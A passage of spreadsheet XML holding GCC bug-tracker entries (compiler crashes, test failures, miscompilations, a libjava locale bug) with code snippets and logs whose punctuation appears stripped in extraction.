    <t>rrh.henry</t>
  </si>
  <si>
    <t>GCC-38632</t>
  </si>
  <si>
    <t>ICE with try/catch and -ftree-parallelize-loops</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE when compiled with
-O -ftree-parallelize-loops=2:
========================================
void foo()
void bar(int n char *p)
{
  try
  {
    foo()
    ++n
    foo()
    for (int i = 0 i &lt; n-1 ++i)
      p[i] = 0
  }
  catch (...)
  {
    for (int i = 0 i &lt; n ++i)
      p[i] = 0
  }
}
========================================
Unable to coalesce ssa_names 1 and 5 which are marked as MUST COALESCE.
n_1(ab) and  n_5(ab)
bug26.cc: In function 'void bar(int char*)':
bug26.cc:8: internal compiler error: SSA corruption
Please submit a full bug report [etc.]
The ICE happens since GCC 4.3.0 when -ftree-parallelize-loops was
introduced.</t>
  </si>
  <si>
    <t>GCC-34690</t>
  </si>
  <si>
    <t>gfortran.dg/elemental_args_check_2.f90 doesn't work</t>
  </si>
  <si>
    <t>On Linux/Intel64 I got
FAIL: gfortran.dg/elemental_args_check_2.f90  -O   (test for errors line 14)
FAIL: gfortran.dg/elemental_args_check_2.f90  -O  (test for excess errors)
with revision 131352.</t>
  </si>
  <si>
    <t>GCC-2859</t>
  </si>
  <si>
    <t>Fix for smp ref-counted string bug on intel systems</t>
  </si>
  <si>
    <t>See libstdc++/2837. The fix has now been used and 
confirmed to work by another user so this report was
created to try and ensure it gets into the next 
release of the compiler. Also it should really have 
been raised as critical in the first report as it
makes the string library unusable on an intel smp
system.
Release:
2.95.2/3</t>
  </si>
  <si>
    <t>GCC-13594</t>
  </si>
  <si>
    <t>[3.4 Regression] namespace association vs. templates part two</t>
  </si>
  <si>
    <t>From:
http://gcc.gnu.org/ml/libstdc++/2004-01/msg00047.html
Ugh more namespace association fallout. It looks like associated namespaces are
not being considered matches. This is probably related to (or the same as) the
other namespace association issue w/ std::swap that Richard Sandiford found.
#if 1
namespace std 
{
  template
    class vector
  template 
    class vector  
}
#else
namespace __gnu_norm
{
  template
    class vector
}
namespace std
{
  using namespace __gnu_norm __attribute__ ((strong))
}
namespace std 
{
  template 
    class vector  
}
#endif
class Foo { }
typedef std::vector FooVec</t>
  </si>
  <si>
    <t>GCC-20366</t>
  </si>
  <si>
    <t xml:space="preserve">AIX g++ -D_LARGE_FILES fails to compile #include </t>
  </si>
  <si>
    <t xml:space="preserve">
	The compiler's C++ headers do not appear to work properly on AIX when
	the compiler is run with -D_LARGE_FILES.  This macro causes the
	system headers to #define symbols like fopen while the C++ headers
	unconditionally #undef these symbols.
Environment:
System: AIX bigblue 2 5 000F699D4C00
host: powerpc-ibm-aix5.2.0.0
build: powerpc-ibm-aix5.2.0.0
target: powerpc-ibm-aix5.2.0.0
configured with: /usr0/slammert/gcc-3.4.3/configure --with-as=/usr/bin/as --with-ld=/usr/bin/ld --disable-nls --enable-languages=cc++ --enable-threads --enable-version-specific-runtime-libs
How-To-Repeat:
	On AIX 5.2 compile the following program with
	3.4.3 g++ -D_LARGE_FILES:
	    #include 
	    int main(void) { return 0 }
	You will get output similar to the following:
	    In file included from /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/powerpc-ibm-aix5.2.0.0/bits/c++locale.h:43
			     from /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/iosfwd:46
			     from /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/ios:44
			     from /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/ostream:45
			     from /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/iostream:45
			     from bug0.C:1:
	    /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/cstdio:108: error: `::fgetpos' has not been declared
	    /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/cstdio:110: error: `::fopen' has not been declared
	    /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/cstdio:115: error: `::freopen' has not been declared
	    /usr/local/lib/gcc/powerpc-ibm-aix5.2.0.0/3.4.3/include/c++/cstdio:118: error: `::fsetpos' has not been declared</t>
  </si>
  <si>
    <t>dsanderson</t>
  </si>
  <si>
    <t>GCC-51941</t>
  </si>
  <si>
    <t>FAIL: g++.dg/debug/dwarf2/nested-3.C scan-assembler</t>
  </si>
  <si>
    <t>The test g++.dg/debug/dwarf2/nested-3.C fails on x86_64-apple-darwin10
FAIL: g++.dg/debug/dwarf2/nested-3.C scan-assembler [^\\n\\r]*\\\\(DIE \\\\(0x([0-9a-f]+)\\\\) DW_TAG_namespace\\\\)[\\n\\r]+[^\\n\\r]*thread[^\\n\\r]+[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*\\\\(DIE \\\\(0x([0-9a-f]+)\\\\) DW_TAG_class_type\\\\)[\\n\\r]+[^\\n\\r]*Executor[^\\n\\r]+[\\n\\r]+[^\\n\\r]*DW_AT_declaration[\\n\\r]+[^\\n\\r]*\\\\(DIE[^\\n\\r]*DW_TAG_subprogram\\\\)[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*CurrentExecutor[^\\n\\r]+[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*end of children of DIE 0x\\\\3[\\n\\r]+[^\\n\\r]*end of children of DIE 0x\\\\1[\\n\\r]+
FAIL: g++.dg/debug/dwarf2/nested-3.C scan-assembler [^\\n\\r]*\\\\(DIE \\\\(0x([0-9a-f]+)\\\\) DW_TAG_namespace\\\\)[\\n\\r]+[^\\n\\r]*thread[^\\n\\r]+[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*\\\\(DIE \\\\(0x([0-9a-f]+)\\\\) DW_TAG_class_type\\\\)[\\n\\r]+[^\\n\\r]*Executor[^\\n\\r]+[\\n\\r]+[^\\n\\r]*DW_AT_declaration[\\n\\r]+[^\\n\\r]*\\\\(DIE[^\\n\\r]*DW_TAG_subprogram\\\\)[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*CurrentExecutor[^\\n\\r]+[\\n\\r]+([^\\n\\r]*[\\n\\r]+)+([^\\n\\r]*[\\n\\r]+)+[^\\n\\r]*end of children of DIE 0x\\\\3[\\n\\r]+[^\\n\\r]*end of children of DIE 0x\\\\1[\\n\\r]+
IIUC the regexp it tries to match the following part of the assembler
Letext0:
	.section .gnu.linkonce.wt.a547508193f2f296
	.long   0x57    # Length of Compilation Unit Info
	.word   0x4     # DWARF version number
	.set L$set$24Ldebug_abbrev0-Lsection__debug_abbrev
	.long L$set$24  # Offset Into Abbrev. Section
	.byte   0x8     # Pointer Size (in bytes)
	.byte   0xa5    # Type Signature
	.byte   0x47
	.byte   0x50
	.byte   0x81
	.byte   0x93
	.byte   0xf2
	.byte   0xf2
	.byte   0x96
	.long   0x37    # Offset to Type DIE
	.byte   0x1     # uleb128 0x1 (DIE (0x17) DW_TAG_type_unit)
	.byte   0x4     # DW_AT_language
	.byte   0xdf    # DW_AT_GNU_odr_signature
	.byte   0xd3
	.byte   0xca
	.byte   0x9a
	.byte   0x1e
	.byte   0x9d
	.byte   0xca
	.byte   0x29
	.set L$set$25Ldebug_line0-Lsection__debug_line
	.long L$set$25  # DW_AT_stmt_list
	.byte   0x2     # uleb128 0x2 (DIE (0x25) DW_TAG_namespace)
	.ascii thread\0       # DW_AT_name
			# DW_AT_declaration
	.long   0x37    # DW_AT_sibling
	.byte   0x3     # uleb128 0x3 (DIE (0x31) DW_TAG_class_type)
	.set L$set$26LASF0-Lsection__debug_str
	.long L$set$26  # DW_AT_name: Executor
			# DW_AT_declaration
	.byte   0       # end of children of DIE 0x25
	.byte   0x4     # uleb128 0x4 (DIE (0x37) DW_TAG_class_type)
	.byte   0x1     # DW_AT_byte_size
	.byte   0x1     # DW_AT_decl_file (/opt/gcc/work/gcc/testsuite/g++.dg/debug/dwarf2/nested-3.C)
	.byte   0x6     # DW_AT_decl_line
	.long   0x31    # DW_AT_specification
	.long   0x54    # DW_AT_sibling
	.byte   0x5     # uleb128 0x5 (DIE (0x43) DW_TAG_subprogram)
			# DW_AT_external
	.set L$set$27LASF1-Lsection__debug_str
	.long L$set$27  # DW_AT_name: CurrentExecutor
	.byte   0x1     # DW_AT_decl_file (/opt/gcc/work/gcc/testsuite/g++.dg/debug/dwarf2/nested-3.C)
	.byte   0x8     # DW_AT_decl_line
	.set L$set$28LASF2-Lsection__debug_str
	.long L$set$28  # DW_AT_linkage_name: _ZN6thread8Executor15CurrentExecutorEv
	.long   0x54    # DW_AT_type
	.byte   0x1     # DW_AT_accessibility
			# DW_AT_declaration
	.byte   0       # end of children of DIE 0x37
	.byte   0x6     # uleb128 0x6 (DIE (0x54) DW_TAG_pointer_type)
	.byte   0x8     # DW_AT_byte_size
	.long   0x37    # DW_AT_type
	.byte   0       # end of children of DIE 0x17
	.section __DWARF__debug_inforegulardebug
Since there are extra lines on x86_64-apple-darwin10 between the two end of children of DIE lines the regexp cannot work. In addition the nesting seems quite different of the expected one.
In top of that it is my understanding that darwin does not support dwarf-4 and is restricted to -gstrict-dwarf (all my knowledge comes from pr41405). So the test should probably skipped on darwin(?).</t>
  </si>
  <si>
    <t>GCC-9672</t>
  </si>
  <si>
    <t>[3.2 regression] ICE: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t xml:space="preserve">The compiler generates an internal compiler error while trying to report
an error in bug.cc
Release:
3.2.2
Environment:
System: SunOS scooby 5.9 Generic_112233-03 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.9
build: sparc-sun-solaris2.9
target: sparc-sun-solaris2.9
configured with: /opt/temp/gcc-3.2.2/configure --prefix=/opt/local --enable-threads
How-To-Repeat:
scooby&gt;	g++ -v -save-temps -c bug.cc
Reading specs from /opt/local/lib/gcc-lib/sparc-sun-solaris2.9/3.2.2/specs
Configured with: /opt/temp/gcc-3.2.2/configure --prefix=/opt/local --enable-threads
Thread model: posix
gcc version 3.2.2
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.9/3.2.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=2 -D__GXX_ABI_VERSION=102 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -D__WINT_TYPE__=long int -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc bug.cc bug.ii
GNU CPP version 3.2.2 (cpplib) (sparc ELF)
ignoring nonexistent directory /opt/local/sparc-sun-solaris2.9/include
ignoring duplicate directory /opt/local/include
#include ... search starts here:
#include  search starts here:
 /opt/local/include/c++/3.2.2
 /opt/local/include/c++/3.2.2/sparc-sun-solaris2.9
 /opt/local/include/c++/3.2.2/backward
 /usr/local/include
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.9/3.2.2/include
 /usr/include
End of search list.
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.9/3.2.2/cc1plus -fpreprocessed bug.ii -quiet -dumpbase bug.cc -version -o bug.s
GNU CPP version 3.2.2 (cpplib) (sparc ELF)
GNU C++ version 3.2.2 (sparc-sun-solaris2.9)
	compiled by GNU C version 3.2.2.
bug.cc: In function `void G(std::basic_string 
   std::allocator &gt; int)':
bug.cc:10: jump to case label
bug.cc:9:   crosses initialization of `std::istringstream i'
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
See attachments for bug.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-7982</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] core dump due to recursive definition (using stl set)</t>
  </si>
  <si>
    <t>Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ../gcc-3.2/configure 
Thread model: posix
gcc version 3.2
g++ -c bug.C
bug.C:10: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
Linux redhat 7.3
How-To-Repeat:
gcc -c bug.C</t>
  </si>
  <si>
    <t>jolly</t>
  </si>
  <si>
    <t>GCC-27842</t>
  </si>
  <si>
    <t>Miscompile of Altivec vec_abs (float) inside loop</t>
  </si>
  <si>
    <t>The following test case gets miscompiled and fails when built
with -O -maltivec -mabi=altivec -include altivec.h on GCC 4.1:
extern void abort (void)
void test (vector float *p int n)
{
  int i
  for (i = 0 i &lt; n i++)
    p[i] = vec_abs (p[i])
}
int
main (void)
{
  vector float p = (vector float){ 0.5 0.5 0.5 0.5 }
  vector float q = p
  test (
  if (memcmp (&amp;p &amp;q sizeof (p)))
    abort ()
  return 0
}
The reason for this appears to be an abuse of RTL semantics by
the altivec_vspltisw_v4sf pattern:
(define_insn altivec_vspltisw_v4sf
  [(set (match_operand:V4SF 0 register_operand =v)
        (vec_duplicate:V4SF
         (float:SF (match_operand:QI 1 s5bit_cint_operand i))))]
  TARGET_ALTIVEC
  vspltisw %0%1
  [(set_attr type vecperm)])
What this instruction does is to load an immediate *integer*
value into a vector register which happens to be re-interpreted
as a floating point value (without changing the bit pattern).
What the RTL associated with the pattern *says* however is
to load the integer *converted to floating point* into the
register which is a quite different semantics.
Now since the pattern is only explicitly generated from within
other expanders inside altivec.md (apparently) all of which
expect the semantics of the actual Altivec instruction not the
semantics as literally specified in the RTL those misinterpretations
generally cancel each other and generated code behaves as expected.
However as soon as the middle-end gets an opportunity to run the
RTL through the simplifier everything breaks.  This happens in
particular when the load is being hoisted out of a loop due to
being loop-invariant as in the above test case: the vec_abs
pattern expands via this expander
 Generate
    vspltisw SCRATCH1-1
    vslw SCRATCH2SCRATCH1SCRATCH1
    vandc %0%1SCRATCH2
(define_expand absv4sf2
  [(set (match_dup 2)
        (vec_duplicate:V4SF (float:SF (const_int -1))))
   (set (match_dup 3)
        (unspec:V4SF [(match_dup 2) (match_dup 2)] UNSPEC_VSLW))
   (set (match_operand:V4SF 0 register_operand =v)
        (and:V4SF (not:V4SF (match_dup 3))
                  (match_operand:V4SF 1 register_operand v)))]
  TARGET_ALTIVEC
{
  operands[2] = gen_reg_rtx (V4SFmode)
  operands[3] = gen_reg_rtx (V4SFmode)
})
and the first two insns are in fact loop invariant.
The problem in this particular test case is a regression in GCC 4.1
introduced by this patch:
[PATCH] Improve scheduling of Altivec absolute value patterns
http://gcc.gnu.org/ml/gcc-patches/2005-02/msg01195.html
-(define_insn absv4sf2
-  [(set (match_operand:V4SF 0 register_operand =v)
-        (abs:V4SF (match_operand:V4SF 1 register_operand v)))
-   (clobber (match_scratch:V4SF 2 =&amp;v))
-   (clobber (match_scratch:V4SF 3 =&amp;v))]
+ Generate
+    vspltisw SCRATCH1-1
+    vslw SCRATCH2SCRATCH1SCRATCH1
+    vandc %0%1SCRATCH2
+(define_expand absv4sf2
+  [(set (match_dup 2)
+       (vec_duplicate:V4SF (float:SF (const_int -1))))
+   (set (match_dup 3)
+        (unspec:V4SF [(match_dup 2) (match_dup 2)] UNSPEC_VSLW))
+   (set (match_operand:V4SF 0 register_operand =v)
+        (and:V4SF (not:V4SF (match_dup 3))
+                  (match_operand:V4SF 1 register_operand v)))]
   TARGET_ALTIVEC
-  vspltisw %2-1\vslw %3%2%2\vandc %0%1%3
-  [(set_attr type vecsimple)
-   (set_attr length 12)])
+{
+  operands[2] = gen_reg_rtx (V4SFmode)
+  operands[3] = gen_reg_rtx (V4SFmode)
+})
However the underlying abuse of RTL semantics when describing the
vspltisw instruction in V4SFmode apparently pre-dates this patch.
The easiest way to fix this would appear to use an UNSPEC to
describe the insn semantics.  Any better idea?</t>
  </si>
  <si>
    <t>GCC-30260</t>
  </si>
  <si>
    <t>Enumeration types and enumeration constants erroneously given unsigned types</t>
  </si>
  <si>
    <t>The comments at the top of the following source file describes the bug.
This happens on gcc 4.1.0 too. for what it is worth uname -a and
gcc -v output for the Linux box I am currently using are at the end.
The actual code is only 14 lines and only includes stdio.h.
/* source file: enum_bug.c
 *
 * An anomaly in gcc C: according to C99 6.7.2.2 enumeration constants
 * must have signed int type and if some enumeration constant has
 * a negative value then the integer type compatible with the
 * enumeration type must be a signed type. It seems to be possible
 * to fool gcc into misapplying these rules by making the type of
 * the integer constant expression giving the value of an enumeration
 * constant an unsigned integer type. This was first observed in a case
 * where the expression involved sizeof but just a cast to unsigned or using
 * an unsigned integer constant has the same effect as seen below:
 *
 * This has been observed on various Linux PCs and on Mac OS X with
 * several versions of gcc (3.4.1 up to 4.1.0).
 *
 * Compiling and running with
 *
gcc -o enum_bug enum_bug.c  ./enum_bug
 *
 * produces no diagnostics and code that prints out the following:
 *
(a &lt; 0) = 1 (A2 &lt; 0) = 1 A{12} = +0 -1
(b &lt; 0) = 0 (B2 &lt; 0) = 0 B{12} = +0 -1
 *
 * Compiling and running with:
 *
gcc -ansi -pedantic -o enum_bug enum_bug.c ./enum_bug
 *
 * results in an an incorrect warning
 *
enum_bug.c:38: warning: ISO C restricts enumerator values to range of `int'
 *
 * but with code that correctly prints out:
 *
(a &lt; 0) = 1 (A2 &lt; 0) = 1 A{12} = +0 -1
(b &lt; 0) = 1 (B2 &lt; 0) = 1 B{12} = +0 -1
 *
 * Rob Arthan (rda at lemma-one dot com) 19th December 2006
 */
#include 
enum A {A1 = 0 A2 = A1 - 1}
enum B {B1 = 0u B2 = B1 - 1}
int main(void)
{
    enum A a = -1
    enum B b = -1
    printf((a &lt; 0) = %d (A2 &lt; 0) = %d A{12} = %+d %+d\n
        (int)(a &lt; 0) (int)(A2 &lt; 0) (int)A1 (int)A2)
    printf((b &lt; 0) = %d (B2 &lt; 0) = %d B{12} = %+d %+d\n
        (int)(b &lt; 0) (int)(B2 &lt; 0) (int)B1 (int)B2)
    return 0
}
/*
 * uname -a:
Linux localhost 2.6.8.1-12mdk #1 Fri Oct 1 12:53:41 CEST 2004 i686 Pentium III (Coppermine) unknown GNU/Linux
 * gcc -v:
Reading specs from /usr/lib/gcc/i586-mandrake-linux-gnu/3.4.1/specs
Configured with: ../configure --prefix=/usr --libdir=/usr/lib --with-slibdir=/lib --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-__cxa_atexit --enable-clocale=gnu --disable-libunwind-exceptions --enable-languages=cc++adaf77objcjava --host=i586-mandrake-linux-gnu --with-system-zlib
Thread model: posix
gcc version 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)
 */</t>
  </si>
  <si>
    <t>rda</t>
  </si>
  <si>
    <t>GCC-6576</t>
  </si>
  <si>
    <t>java.util.ResourceBundle.getResource ignores locale</t>
  </si>
  <si>
    <t>The java.util.ResourceBundle.getBundle(StringLocale) function
appears to ignore the locale argument.
Release:
3.1 20020423 (prerelease)
Environment:
System: Linux linuix 2.4.18-4GB #1 Wed Mar 27 13:57:05 UTC 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/packages/gnu-snapshot --enable-shared --enable-version-specific-runtime-libs --enable-nls
How-To-Repeat:
$ export CLASSPATH=.
$ cat  prog_fr.java
/* Automatically generated by GNU msgfmt.  Do not modify!  */
public class prog_fr extends java.util.ResourceBundle {
  private static final java.util.Hashtable table
  static {
    java.util.Hashtable t = new java.util.Hashtable()
    t.put(Content-Type: text/plain charset=UTF-8\nPlural-Forms: nplurals=2 plural=(n &gt; 1)\n)
    t.put('Your command please?' asked the waiter.\u00abVotre commande s'il vous plait\u00bb dit le gar\u00e7on.)
    t.put(a piece of cakenew java.lang.String[] { un morceau de gateau {0number} morceaux de gateau })
    t.put({0} is replaced by {1}.{1} remplace {0}.)
    table = t
  }
  public static final java.util.Hashtable plural
  static {
    java.util.Hashtable p = new java.util.Hashtable()
    p.put(a piece of cake{0number} pieces of cake)
    plural = p
  }
  public java.lang.Object lookup (java.lang.String msgid) {
    return table.get(msgid)
  }
  public java.lang.Object handleGetObject (java.lang.String msgid) throws java.util.MissingResourceException {
    java.lang.Object value = table.get(msgid)
    return (value instanceof java.lang.String[] ? ((java.lang.String[])value)[0] : value)
  }
  public java.util.Enumeration getKeys () {
    return table.keys()
  }
  public static long pluralEval (long n) {
    return ((n &gt; 1) ? 1 : 0)
  }
  public java.util.ResourceBundle getParent () {
    return parent
  }
}
EOF
$ gcj -C -O -d . prog_fr.java
$ cat  DumpResource.java
import java.lang.reflect.*
import java.util.*
import java.io.*
public class DumpResource {
  public DumpResource (String resource_name String locale_name) {
    // Split locale_name into language_country_variant.
    String language
    String country
    String variant
    language = locale_name
    {
      int i = language.indexOf('_')
      if (i &gt;= 0) {
        country = language.substring(i+1)
        language = language.substring(0i)
      } else
        country = 
    }
    {
      int j = country.indexOf('_')
      if (j &gt;= 0) {
        variant = country.substring(j+1)
        country = country.substring(0j)
      } else
        variant = 
    }
    Locale locale = new Locale(languagecountryvariant)
    // Get the resource.
    System.out.println(Calling getBundle(+resource_name++locale+).)
    ResourceBundle catalog = ResourceBundle.getBundle(resource_namelocale)
  }
  public static void main (String[] args) {
    new DumpResource(args[0] args.length &gt; 1 ? args[1] : )
    System.exit(0)
  }
}
EOF
$ gcj -C -O -d . DumpResource.java
$ gij DumpResource prog fr
Calling getBundle(progfr).
Exception in thread main java.util.MissingResourceException: Bundle prog not found
   at 0x4025bf70: java.lang.Throwable.Throwable(java.lang.String) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4024aed6: java.lang.Exception.Exception(java.lang.String) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4024fba6: java.lang.RuntimeException.RuntimeException(java.lang.String) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x402a0ea9: java.util.MissingResourceException.MissingResourceException(java.lang.String java.lang.String java.lang.String) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x402a4ec9: java.util.ResourceBundle.getBundle(java.lang.String java.util.Locale java.lang.ClassLoader) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x402a495b: java.util.ResourceBundle.getBundle(java.lang.String java.util.Locale) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403d76e7: ffi_call_SYSV (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403d7697: ffi_raw_call (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4022e20b: _Jv_InterpMethod.continue1(_Jv_InterpMethodInvocation) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403e2644: _Jv_InterpMethod.run(ffi_cif void ffi_raw _Jv_InterpMethodInvocation) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4022c024: _Jv_InterpMethod.run_normal(ffi_cif void ffi_raw void) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403d754c: ?? (??:0)
   at 0x403d76e7: ffi_call_SYSV (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403d7697: ffi_raw_call (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4022e20b: _Jv_InterpMethod.continue1(_Jv_InterpMethodInvocation) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403e2644: _Jv_InterpMethod.run(ffi_cif void ffi_raw _Jv_InterpMethodInvocation) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4022c024: _Jv_InBFD: Dwarf Error: Invalid or unhandled FORM value: 14.
BFD: Dwarf Error: Invalid or unhandled FORM value: 14.
BFD: Dwarf Error: Invalid or unhandled FORM value: 14.
BFD: Dwarf Error: Invalid or unhandled FORM value: 14.
terpMethod.run_normal(ffi_cif void ffi_raw void) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x403d754c: ?? (??:0)
   at 0x40232408: gnu.gcj.runtime.FirstThread.call_main() (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x402bab18: gnu.gcj.runtime.FirstThread.run() (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4023dbcc: _Jv_ThreadRun(java.lang.Thread) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x4021a2c4: _Jv_RunMain(java.lang.Class byte const int byte const boolean) (/packages/gnu-snapshot/lib/libgcj.so.3)
   at 0x08048a20: main (get_vector/../../../libjava/gij.cc:140)
   at 0x405de668: __libc_start_main (/lib/libc.so.6)
   at 0x08048781: _start (??:0)
When I look (using strace) what files gij is trying to open()
I see that it searching for ./prog.properties and ./prog.class
but not for ./prog_fr.properties and ./prog_fr.class. It should
search first for ./prog_fr.properties and ./prog_fr.class and
then only for ./prog.properties and ./prog.class.</t>
  </si>
  <si>
    <t>GCC-37893</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in java during bootstrap at revision 141303</t>
  </si>
  <si>
    <t>At revision 141303 bootstrap failed with
...
libtool: compile:  /opt/gcc/i686-darwin/gcc/gcj -B/opt/gcc/i686-darwin/i686-apple-darwin9/x86_64/libjava/ -B/opt/gcc/i686-darwin/gcc/ -ffloat-store -fomit-frame-pointer -Usun -fclasspath= -fbootclasspath=../../../../gcc-4.4-work/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -findirect-dispatch -fno-indirect-classes -fsource-filename=/opt/gcc/i686-darwin/i686-apple-darwin9/x86_64/libjava/classpath/tools/all-classes.lst -g -O2 -m64 -MT classpath/tools/libgcj_tools_la-tools.lo -MD -MP -MF classpath/tools/.deps/libgcj_tools_la-tools.Tpo -c classpath/tools/tools.zip  -fno-common -o classpath/tools/.libs/libgcj_tools_la-tools.o
jc1: internal compiler error: in java_read_sourcefilenames at java/jcf-parse.c:192
Last successful bootstrap r141279.</t>
  </si>
  <si>
    <t>GCC-8274</t>
  </si>
  <si>
    <t>dgfdsg</t>
  </si>
  <si>
    <t>dssg
Release:
unknown
Environment:
fdsfg
How-To-Repeat:
dfgd</t>
  </si>
  <si>
    <t>feichunyong</t>
  </si>
  <si>
    <t>GCC-63574</t>
  </si>
  <si>
    <t>[5 Regression] ICE building libjava (segfault) on arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>libjava ftbfs on trunk r216349 last successful build seen on 20140919
../../../src/libjava/sun/misc/natUnsafe.cc  -fPIC -DPIC -o sun/misc/.libs/natUnsafe.o
../../../src/libjava/sun/misc/natUnsafe.cc:253:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
configured for armv7-a hard-float thumb mode.</t>
  </si>
  <si>
    <t>GCC-45432</t>
  </si>
  <si>
    <t>gfortran.dg/allocate_alloc_opt_9.f90: Segfault due to invalid FREE</t>
  </si>
  <si>
    <t>When running gfortran gfortran.dg/allocate_alloc_opt_9.f90 I get an ICE with
  free_expr0(): Bad expr type
That happens for the second call to gfc_match_allocate and the ICE happens via gfc_match_allocate (match.c:309) -&gt; gfc_free_expr
valgrind writes:
	==2974== Invalid read of size 4
	==2974== at 0x508BC9: gfc_match_allocate (match.c:3098)
	==2974== by 0x518FA9: match_word (parse.c:65)
	==2974== by 0x519EFC: decode_statement (parse.c:332)
If one prints the value of tmp and tmp-&gt;expr_type one gets tmp != NULL and expr_type == 1549556828 ...
Daniel checked 4.5.0 and found the same valgrind error.</t>
  </si>
  <si>
    <t>GCC-19061</t>
  </si>
  <si>
    <t>IA64 GCC pointer confusion results in optimization error</t>
  </si>
  <si>
    <t>The included program coredumps during execution when compiled with -O2 but not
when compiled with -O0.  The problem appears to be with combine and the use of
the ptr_extend_plus_2 instruction.  GCC is losing track of what is and isn't a
pointer.  I am not entirely sure if the program is legal given all the casts.
struct magic_state {
    void *mgs_sv
}
typedef struct magic_state MGS
MGS *PL_savestack
void
restore_magic(void *p)
{
    MGS* mgs = ((MGS*) ((char*)PL_savestack + (long)(p)))
    if (!mgs-&gt;mgs_sv)
        return
    mgs-&gt;mgs_sv = ((void *)0)
}
MGS s
main()
{
        PL_savestack = 
        restore_magic((void *) 0)
}</t>
  </si>
  <si>
    <t>GCC-81266</t>
  </si>
  <si>
    <t>FAIL: 30_threads/thread/native_handle/typesizes.cc execution test on darwin</t>
  </si>
  <si>
    <t>After revision r249217 the test 30_threads/thread/native_handle/typesizes.cc fails at run time on darwin with (it was UNSUPPORTED before this revision)
terminate called after throwing an instance of 'std::runtime_error'
  what():
size of _Tp: 4
alignment of _Tp: 4
size of *(_Tp::native_handle_type): 4096
alignment of *(_Tp::native_handle_type): 4096</t>
  </si>
  <si>
    <t>GCC-4417</t>
  </si>
  <si>
    <t>struct copy calls memcpy with -ffreestanding</t>
  </si>
  <si>
    <t>-freestanding will under some conditions generate a call to 
memcpy behind the back of the user.  This defeats the point of 
that flag
Release:
3.0.1
Environment:
Any IA32 target from what I can tell.
How-To-Repeat:
typedef struct foo{
        char blah[1024]
} foo_t
extern foo_t one two
void
foo(void)
{
        one = two
}
$ cc -ffreestanding -O3 -S -o - a.c | grep memcpy
        call    memcpy</t>
  </si>
  <si>
    <t>GCC-12713</t>
  </si>
  <si>
    <t>Document interaction of attribute noreturn and longjmp</t>
  </si>
  <si>
    <t>On reading the description of __attribute__ ((noreturn)) in the
